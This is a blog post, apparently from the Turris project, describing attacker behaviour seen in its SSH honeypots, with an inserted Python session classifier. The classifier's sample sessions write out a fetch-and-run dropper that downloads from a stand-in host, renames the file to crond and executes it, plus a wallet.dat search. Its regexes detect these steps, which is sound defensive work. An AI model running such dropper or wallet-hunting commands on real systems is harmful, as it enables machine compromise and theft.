Who’s poking at our Turris SSH honeypot

The Turris SSH honeypots are certainly not idle. There are currently 168 active honeypots, which together record 1,000 to 2,000 SSH sessions containing at least one command per day, and on some days as many as 5,000.

Logins are accepted for the usernames “root” and “admin” (any password works). I wrote a simple script that classifies the most common behaviours, computes statistics and prints out the sessions it does not recognise. A typical sample of 1,000 SSH sessions looks like this:

  • 77 Mayday.f DDoS bot – installation attempt
  • 17 Ganiw DDoS bot – installation attempt
  • 727 statistics gathering (uname, ifconfig, memory size, etc.)
  • 66 attempts to exfiltrate the data stored by a bot
  • 7 WinSCP
  • 2 shell bot dropper (downloads other malware)

The rest are relatively unique command sequences, and sometimes even real people fall into the honeypot trap. You can tell from the pace at which the commands arrive: a script dumps them all at once, while a human takes their time. Human attackers mostly install Trojans or IRC bots. In some cases the code is so old that it still queries the AltaVista search engine; for some reason it prefers AltaVista US, IT and DE.

Bots and Trojans sometimes try to obfuscate themselves a little by renaming themselves, or by taking the name of something harmless such as bash or crond.

Statistics gathering may indicate that the attacker is looking for a suitable machine (e.g. weeding out SOHO routers) or trying to detect the honeypot. We do not have the code of the attacker’s script, so we cannot know for sure.

Another category consists of financially motivated attackers searching for various cryptocurrency wallets.
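To make the classification above concrete, here is a small Python classifier in the spirit of the script described at the start of the post. It is an added example, not the Turris team’s own script (which the post does not publish): it assigns each session the first signature that matches, counts sessions per category, reports the unrecognised ones, uses the gap between consecutive commands to separate scripts from people, and flags a downloaded file being renamed to bash or crond. The statistics-gathering and masquerading patterns follow what the post describes; the dropper and wallet-search regexes, the one-second pace threshold and all sample sessions are constructed assumptions for illustration.

```python
"""Heuristic classifier for SSH honeypot sessions.

A session is the list of commands an attacker ran after login, each paired
with the number of seconds since the session started. Sessions matching a
known behaviour are counted; everything else is reported as "unfamiliar" so
a human can read it. Inter-command timing separates scripts, which dump
their commands at once, from people, who pause between them.
"""
import re
from collections import Counter

# Constructed signature rules for this example (not the Turris project's own
# classifier). A rule is a list of regexes; every regex must match at least
# one command in the session. More specific rules come first so that a
# dropper which also runs uname is not filed under statistics gathering.
RULES = [
    ("shell bot dropper", [
        r"\b(wget|curl|tftp)\b",           # fetch a payload
        r"\bchmod\s+(\+x|[0-7]*7[0-7]*)",  # make it executable
        r"(^|[;&|]\s*)\./",                # run it from the current directory
    ]),
    ("wallet search", [
        r"\bfind\b.*\bwallet\b|\bwallet\.dat\b",
    ]),
    ("statistics gathering", [
        r"\buname\b",
        r"\b(ifconfig|ip\s+a(ddr)?)\b|/proc/meminfo|\bfree\b",
    ]),
]

# Harmless-looking names the post says bots rename themselves to.
MASQUERADE_NAMES = {"bash", "crond"}

# "mv SRC DST" or "cp SRC DST" (optional flags); captures DST up to a shell separator.
RENAME_RE = re.compile(r"\b(?:mv|cp)\s+(?:-\S+\s+)*\S+\s+([^\s;&|]+)")


def rule_matches(regexes, commands):
    """True when every regex in the rule matches at least one command."""
    return all(any(re.search(rx, cmd) for cmd in commands) for rx in regexes)


def classify(commands):
    """Return the first matching category name, or 'unfamiliar'."""
    for name, regexes in RULES:
        if rule_matches(regexes, commands):
            return name
    return "unfamiliar"


def masquerade_names(commands):
    """Names from MASQUERADE_NAMES that some file was renamed or copied to."""
    found = set()
    for cmd in commands:
        for m in RENAME_RE.finditer(cmd):
            base = m.group(1).rsplit("/", 1)[-1]
            if base in MASQUERADE_NAMES:
                found.add(base)
    return found


def pace(session, max_gap=1.0):
    """'scripted' if every gap between consecutive commands is below max_gap
    seconds, 'interactive' otherwise, 'unknown' for single-command sessions."""
    times = [t for t, _ in session]
    if len(times) < 2:
        return "unknown"
    gaps = [b - a for a, b in zip(times, times[1:])]
    return "scripted" if max(gaps) < max_gap else "interactive"


def summarize(sessions):
    """Count sessions per category and collect the unfamiliar ones."""
    counts = Counter()
    unfamiliar = []
    for session in sessions:
        commands = [cmd for _, cmd in session]
        category = classify(commands)
        counts[category] += 1
        if category == "unfamiliar":
            unfamiliar.append(session)
    return counts, unfamiliar


# Constructed sample sessions (seconds since login, command); not captured data.
SESSIONS = [
    [(0.01, "uname -a"), (0.02, "cat /proc/meminfo"), (0.03, "ifconfig")],
    [(0.00, "cd /tmp; wget http://example.invalid/x.sh"),
     (0.10, "mv x.sh crond; chmod +x crond"), (0.20, "./crond")],
    [(0.00, "find / -name wallet.dat 2>/dev/null")],
    [(0.0, "uname -a"), (8.4, "ls"), (21.7, "apt-get install gcc"),
     (40.2, "exit"), (43.9, "quit"), (45.0, "logout")],
]

if __name__ == "__main__":
    counts, unknown = summarize(SESSIONS)
    for category, n in counts.most_common():
        print(f"{n:4d} {category}")
    for session in unknown:
        print("unfamiliar", pace(session), [cmd for _, cmd in session])
    for session in SESSIONS:
        names = masquerade_names([cmd for _, cmd in session])
        if names:
            print("masquerading as", sorted(names))
```

The rule list is ordered from specific to generic on purpose; adding a new behaviour means appending a rule, and anything that still lands in “unfamiliar” is what you read by hand, which is exactly where the curiosities below come from.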

Curiosities

In addition to the guy trying to install a 15-year-old IRC bot, there are other odd individuals. One of them, for example, wanted to install a streaming audio server (ShoutCast).

A few others tried to install Steam and launch a Counter-Strike server. Another one looked, unsuccessfully, for installed games.

A “script kiddie” we saw recently tried to install a compiler together with development versions of libraries and compile god knows what. Eventually he gave up and tried desperately to log out with exit, exit, exit, quit and logout, only to find that he still couldn’t (it’s a slightly odd feature of the honeypot that it won’t let you log out; nobody seems to fall for it in the end, but it’s fun to watch them struggle for a while :-)).

Comments (2)

  1. lobo says:

    lol 🙂

  2. leo says:

    Hi,

    great feature! Would it be possible to extend the list of allowed usernames so that more attacks are trapped in the honeypot? Some ideas: “user”, “ubnt”, “Administrator” or “supervisor”.

    Kind regards
